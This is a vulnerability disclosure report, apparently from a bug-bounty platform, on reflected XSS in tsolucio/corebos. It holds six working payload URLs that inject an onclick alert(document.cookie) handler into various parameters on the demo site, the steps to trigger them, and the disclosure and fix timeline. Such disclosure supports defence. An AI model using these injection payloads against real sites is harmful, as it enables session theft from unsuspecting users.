Reflected XSS in multiple parameters in tsolucio/corebos

Valid

Reported on

Jun 27th 2022


Testing Environment

  1. Windows OS
  2. Firefox Browser

Vulnerable URLs


https://demo.corebos.com/index.php?module=Documents&action=EditView&return_module=nerrorsec%22+accesskey=%22a%22+onclick=%22alert(document.cookie)%22%20test=%22%3C&return_action=DetailView&return_id=236&parent_id=236&createmode=link


https://demo.corebos.com/index.php?module=Documents&action=EditView&return_action=nerrorsec%22+accesskey=%22a%22+onclick=%22alert(document.cookie)%22%20test=%22%3C&return_module=DetailView&return_id=236&parent_id=236&createmode=link


https://demo.corebos.com/index.php?module=Documents&action=EditView&return_id=nerrorsec%22+accesskey=%22a%22+onclick=%22alert(document.cookie)%22%20test=%22%3C&return_action=DetailView&return_module=236&parent_id=236&createmode=link


https://demo.corebos.com/index.php?module=Documents&action=EditView&parent_id=nerrorsec%22+accesskey=%22a%22+onclick=%22alert(document.cookie)%22%20test=%22%3C&return_action=DetailView&return_id=236&return_module=236&createmode=link


https://demo.corebos.com/index.php?module=Documents&action=EditView&parent_id=test&return_action=DetailView&return_id=236&return_module=236&createmode=nerrorsec%22+accesskey=%22a%22+onclick=%22alert(document.cookie)%22%20test=%22%3C


https://demo.corebos.com/index.php?module=Home&action=HomeAjax&file=HomeBlock&homestuffid=151&blockstufftype=ReportChartstest%20accesskey=%22a%22%20onclick=%22alert(document.cookie)%22


Proof of Concept

  1. Login to the application
  2. Visit vulnerable URL.
  3. Press SHIFT + ALT + A to execute the payload.

Impact

The attacks commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site.

We are processing your report and will contact the tsolucio/corebos team within 24 hours. 3 months ago
nerrorsec modified the report
3 months ago
We have contacted a member of the tsolucio/corebos team and are waiting to hear back 3 months ago
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. 3 months ago
We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. 2 months ago
We have sent a third and final follow up to the tsolucio/corebos team. This report is now considered stale. 2 months ago
Joe Bordes validated this vulnerability a month ago
nerrorsec has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Joe Bordes confirmed that a fix has been merged on 3a73d9 a month ago
Joe Bordes has been awarded the fix bounty
EditView.php#L1-L359 has been validated
to join this conversation